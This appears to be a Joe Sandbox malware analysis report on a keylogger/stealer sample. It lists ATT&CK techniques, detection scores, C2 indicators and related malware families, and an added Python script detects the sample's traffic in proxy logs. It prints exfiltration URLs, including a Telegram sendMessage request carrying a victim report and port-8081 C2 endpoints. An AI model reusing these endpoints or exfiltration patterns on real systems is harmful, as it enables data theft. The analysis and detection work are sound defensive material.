                Discovery: 21 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Source | Detection | Scanner | Label
                file.exe | 42% | Virustotal |
                file.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                reallyfreegeoip.org | 188.114.96.3 | true | false | | high
                api.telegram.org | 149.154.167.220 | true | false | | high
                checkip.dyndns.com | 193.122.6.168 | true | false | | high
                checkip.dyndns.org | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                http://checkip.dyndns.org/ | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2031/12/2024%20/%2020:54:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.fontbureau.com/designersG | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers/? | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.founder.com.cn/cn/bThe | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org | file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot | file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers? | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.office.com/lB | file.exe, 00000002.00000002.4144889269.000000000327F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.tiro.com | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.goodfont.co.kr | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://chrome.google.com/webstore?hl=en | file.exe, 00000002.00000002.4144889269.0000000003253000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://varders.kozow.com:8081 | file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.sajatypeworks.com | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.typography.netD | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.founder.com.cn/cn/cThe | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.galapagosdesign.com/staff/dennis.htm | file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a | file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp | false |
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.org/qfile.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://chrome.google.com/webstore?hl=enlBfile.exe, 00000002.00000002.4144889269.000000000324E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/DPleasefile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.fonts.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.sandoll.co.krfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.urwpp.deDPleasefile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.zhongyicts.com.cnfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.sakkal.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.office.com/file.exe, 00000002.00000002.4144889269.0000000003284000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003275000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.carterandcone.comlfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://aborters.duckdns.org:8081file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.founder.com.cn/cnfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anotherarmy.dns.army:8081file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.jiyu-kobo.co.jp/file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000310B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://reallyfreegeoip.orgfile.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.fontbureau.com/designers8file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfile.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
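Read together, the URL and IP tables give the bot's complete network sequence: a public-IP lookup (checkip.dyndns.org, then reallyfreegeoip.org/xml/ followed by the address it learned), a Telegram sendMessage call whose text parameter starts with a percent-encoded "PC Name:" line, and three dynamic-DNS hosts plus one raw IP on port 8081 that were extracted from the same memory regions. The font-vendor URLs in the table are typical of embedded font metadata and are not useful as indicators. The example below is added here and is neither Joe Sandbox output nor code from the sample: it turns the report's indicators into detection logic run over a constructed proxy log. The log format (time, client, method, URL, status), the client addresses, and the Telegram token and chat_id are assumptions. A client is flagged only when the lookup step is followed by one of the exfiltration channels, since an IP-lookup or a Telegram request on its own is common in benign traffic.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the URL and IP tables of this report. The four
# port-8081 endpoints, api.telegram.org and the two lookup services were all
# recovered from the sample's memory; nothing here is invented.
PORT_8081_HOSTS = {"varders.kozow.com", "aborters.duckdns.org",
                   "anotherarmy.dns.army", "51.38.247.67"}
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com",
                   "reallyfreegeoip.org"}
# The report shows the token stripped ("/bot/sendMessage"), so the token
# segment is allowed to be empty.
TELEGRAM_SEND = re.compile(r"^/bot[^/]*/sendMessage$")

# Constructed proxy log (assumed format: time client method url status).
# Client addresses, token "123456:ABCDEF" and chat_id are placeholders.
SAMPLE_LOG = """\
2024-12-31T08:15:01Z 10.0.0.12 GET http://checkip.dyndns.org/ 200
2024-12-31T08:15:02Z 10.0.0.12 GET https://reallyfreegeoip.org/xml/203.0.113.7 200
2024-12-31T08:15:04Z 10.0.0.12 POST https://api.telegram.org/bot123456:ABCDEF/sendMessage?chat_id=1&text=%20%0D%0A%0D%0APC%20Name:WS-01%0D%0ADate%20and%20Time:2024 200
2024-12-31T08:15:05Z 10.0.0.12 POST http://51.38.247.67:8081/_send_.php 200
2024-12-31T08:16:00Z 10.0.0.34 GET https://www.office.com/ 200
2024-12-31T08:16:10Z 10.0.0.34 GET https://api.telegram.org/bot123456:ABCDEF/getMe 200
2024-12-31T08:17:00Z 10.0.0.57 GET http://checkip.dyndns.org/ 200
"""


def classify(url):
    """Return the indicator labels one requested URL matches (empty = none)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = []
    if host in PORT_8081_HOSTS and parts.port == 8081:
        labels.append("port-8081-host")
    if host in IP_LOOKUP_HOSTS:
        labels.append("ip-lookup")
    if host == "api.telegram.org" and TELEGRAM_SEND.match(parts.path):
        labels.append("telegram-sendMessage")
        # parse_qs percent-decodes, so the %20%0D%0A%0D%0APC%20Name: prefix
        # seen in the report becomes the literal " \r\n\r\nPC Name:" here.
        text = parse_qs(parts.query).get("text", [""])[0]
        if "PC Name:" in text:
            labels.append("keylogger-report-body")
    return labels


def scan(log_text):
    """Group matched labels by client address; clients with no hits are absent."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line, skip rather than crash the scan
        _ts, client, _method, url, _status = fields[:5]
        for label in classify(url):
            hits[client].add(label)
    return dict(hits)


def verdict(hits):
    """Flag a client only when the IP lookup is paired with an exfil channel."""
    exfil = {"telegram-sendMessage", "keylogger-report-body", "port-8081-host"}
    return sorted(client for client, labels in hits.items()
                  if "ip-lookup" in labels and labels & exfil)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for client, labels in sorted(found.items()):
        print(client, sorted(labels))
    print("flagged:", verdict(found))
```

In the constructed log, 10.0.0.12 reproduces the sequence from the report and is flagged; 10.0.0.57 only does the IP lookup and 10.0.0.34 only calls a non-sendMessage Telegram method, so neither is flagged. For production use, replace `SAMPLE_LOG` with the proxy's real export and extend `PORT_8081_HOSTS` as new samples in the associated-sample tables surface further endpoints.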
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582677
Start date and time: 2024-12-31 09:14:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/6@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 79
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.190.159.68, 184.28.90.27, 52.149.20.212, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 7692 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Report size getting too big, too many NtSetInformationFile calls found
Time | Type | Description
03:14:58 | API Interceptor | 9347183x Sleep call for process: file.exe modified
03:15:12 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | XClient.exe | malicious | XWorm |
149.154.167.220 | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | iviewers.dll | malicious | LummaC |
149.154.167.220 | Flasher.exe | malicious | Luca Stealer, Rusty Stealer |
149.154.167.220 | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar |
149.154.167.220 | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine |
149.154.167.220 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | Proforma Invoice.exe | malicious | MassLogger RAT |
149.154.167.220 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
193.122.6.168 | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.6.168 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | Proforma Invoice.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | HUBED342024.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | YU SV Payment.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | Invoice.exe | malicious | Snake Keylogger | checkip.dyndns.org/
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| reallyfreegeoip.org | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.97.3 |
| | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | Dotc67890990.exe | malicious | Snake Keylogger | 104.21.67.152 |
| | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134 |
| | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134 |
| | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 172.67.177.134 |
| | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 172.67.177.134 |
| | Proforma Invoice.exe | malicious | MassLogger RAT | 104.21.67.152 |
| | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.67.152 |
| checkip.dyndns.com | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169 |
| | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 193.122.130.0 |
| | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.247.73 |
| | ZOYGRL1ePa.exe | malicious | Agent Tesla, AgentTesla | 158.101.44.242 |
| | Dotc67890990.exe | malicious | Snake Keylogger | 132.226.247.73 |
| | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168 |
| | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168 |
| | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 193.122.6.168 |
| | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 193.122.6.168 |
| | Proforma Invoice.exe | malicious | MassLogger RAT | 193.122.6.168 |
| api.telegram.org | XClient.exe | malicious | XWorm | 149.154.167.220 |
| | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220 |
| | iviewers.dll | malicious | LummaC | 149.154.167.220 |
| | Flasher.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220 |
| | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220 |
| | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | Proforma Invoice.exe | malicious | MassLogger RAT | 149.154.167.220 |
| | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | tg.exe | malicious | Babadeda | 149.154.167.220 |
| | tg.exe | malicious | Babadeda | 149.154.167.220 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| ORACLE-BMC-31898US | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 193.122.130.0 |
| | ZOYGRL1ePa.exe | malicious | Agent Tesla, AgentTesla | 158.101.44.242 |
| | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168 |
| | armv4l.elf | malicious | Mirai | 129.148.142.134 |
| | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168 |
| | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 193.122.6.168 |
| | splm68k.elf | malicious | Unknown | 129.147.168.111 |
| | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 193.122.6.168 |
| | Proforma Invoice.exe | malicious | MassLogger RAT | 193.122.6.168 |
| | HUBED342024.exe | malicious | MassLogger RAT | 193.122.6.168 |
| TELEGRAMRU | XClient.exe | malicious | XWorm | 149.154.167.220 |
| | BHgwhz3lGN.exe | malicious | Vidar | 149.154.167.99 |
| | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220 |
| | Tool_Unlock_v1.2.exe | malicious | Vidar | 149.154.167.99 |
| | iviewers.dll | malicious | LummaC | 149.154.167.220 |
| | Flasher.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220 |
| | JA7cOAGHym.exe | malicious | Vidar | 149.154.167.99 |
| | https://linkenbio.net/59125/247 | malicious | Unknown | 149.154.167.99 |
| | aD7D9fkpII.exe | malicious | Vidar | 149.154.167.99 |
| | installer.bat | malicious | Vidar | 149.154.167.99 |
| CLOUDFLARENETUS | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | DIS_37745672.pdf | malicious | KnowBe4, PDFPhish | 104.17.247.203 |
| | Poket.mp4.hta | malicious | LummaC | 188.114.97.3 |
| | https://nutricarm.es/wp-templates/f8b83.php | malicious | Unknown | 104.21.96.1 |
| | Exlan_setup_v3.1.2.exe | malicious | LummaC | 172.67.157.254 |
| | RtU8kXPnKr.exe | malicious | Quasar | 104.26.12.205 |
| | http://ghostbin.cafe24.com/ | malicious | Unknown | 104.18.27.193 |
| | http://parrottalks.info | malicious | Unknown | 1.1.1.1 |
| | https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 104.17.208.240 |
| | Fizzy Loader.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.138.232 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 54328bd36c14bd82ddaa0c04b25ed9ad | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | RtU8kXPnKr.exe | malicious | Quasar | 188.114.96.3 |
| | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | Dotc67890990.exe | malicious | Snake Keylogger | 188.114.96.3 |
| | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 188.114.96.3 |
| | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 188.114.96.3 |
| | Proforma Invoice.exe | malicious | MassLogger RAT | 188.114.96.3 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Poket.mp4.hta | malicious | LummaC | 149.154.167.220 |
| | Fizzy Loader.exe | malicious | Blank Grabber, Umbral Stealer | 149.154.167.220 |
| | Epsilon.exe | malicious | Unknown | 149.154.167.220 |
| | XClient.exe | malicious | XWorm | 149.154.167.220 |
| | hoEtvOOrYH.exe | malicious | SmokeLoader | 149.154.167.220 |
| | web44.mp4.hta | malicious | LummaC | 149.154.167.220 |
| | random.exe | malicious | LummaC | 149.154.167.220 |
| | eXbhgU9.exe | malicious | LummaC | 149.154.167.220 |
| | Supplier.bat | malicious | Unknown | 149.154.167.220 |
| | Supplier.bat | malicious | LodaRAT, XRed | 149.154.167.220 |
No context

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.123563711576858
Encrypted: false
SSDEEP: 192:RTGWgIBJCvpOy0A0BU/fIxaWOJoNZrMbzuiF7Z24IO8qB1:zgaSw7BU/iaxbzuiF7Y4IO861
MD5: E034125D21B49A328F7C72FB429222D8
SHA1: D9FA6223D97182A8C335373E1E8B26A377052BA7
SHA-256: 995838C1EF4BAE9AC119F351EB1AFC9012DF7F77C1CD667AC621E904C586320B
SHA-512: 608D3C07CDF36263CA971EB378EEC402FFB4030F2AB089D0776E104B53CA1D42E3FF941F09E02A0A98206514F0D733E426B53AD4AA8A1BE470B692BB657AD1DA
Malicious: true
Reputation: low
